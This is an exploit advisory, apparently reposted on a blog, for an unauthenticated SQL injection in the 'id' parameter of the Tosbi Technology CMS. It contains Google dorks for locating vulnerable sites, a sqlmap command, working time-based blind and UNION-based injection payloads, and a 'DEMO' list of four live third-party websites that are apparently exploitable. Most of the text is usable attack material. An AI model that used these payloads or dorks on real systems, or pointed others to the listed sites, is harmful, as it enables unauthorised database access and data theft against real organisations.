Tosbi Technology CMS - SQL Injection Vulnerability
=========================================================
[+] Title                 :- Tosbi Technology CMS - SQL Injection Vulnerability 
[+] Date                  :- 27 - June - 2015
[+] Vendor Homepage       :- http://www.tosbitechnology.com/
[+] Version               :- All Versions
[+] Tested on             :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category              :- webapps
[+] Google Dorks          :- "Developed by Tosbi Technology"
                             "Developed by Tosbi Technology" inurl:"php?id="
                             "Developed by Tosbi Technology" +inurl:/.php?id=                      
[+] Exploit Author        :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name             :- Team Alastor Breeze, Intelligent-Exploit
[+] Official Website      :- intelligentexploit.com
[+] The official Members  :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k
[+] Greedz to             :- @@lu, Lalit, MyLappy<3, Diksha, DK
[+] Contact               :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
=========================================================
[+] Severity Level          :- High
[+] Request Method(s)       :- GET / POST
[+] Vulnerable Parameter(s) :- id
[+] Affected Area(s)        :- Entire admin, database, Server
[+] About                   :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error
[+] SQL vulnerable File     :- home/DOMAIN/public_html/index.php
[+] POC                     :- http://127.0.0.1/index.php?id=[SQL]'
The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.
SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://127.0.0.1/index.php?id=[SQL]" --dbs
++++++++++++++++++++++++++
---
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=915' AND (SELECT * FROM (SELECT(SLEEP(5)))uMzf) AND 'YEbn'='YEbn
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5657' UNION ALL SELECT NULL,CONCAT(0x7171787171,0x4141464957556e754955,0x7176707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[+] DEMO :-   http://www.mayaradio.tosbitechnology.com/play-media.php?id=915%27
              http://www.self-letting.com/read-news.php?id=26%27
              http://www.myiyanga.com/view-post.php?id=93%27 
              http://kayfoundationafrica.org/view-news.php?id=1%27
=======================================================
Tosbi Technology CMS - SQL Injection Vulnerability 
 
        Reviewed by Izza009
        on 
        
17.23
 
        Rating: 
 
        Reviewed by Izza009
        on 
        
17.23
 
        Rating: 

Tidak ada komentar: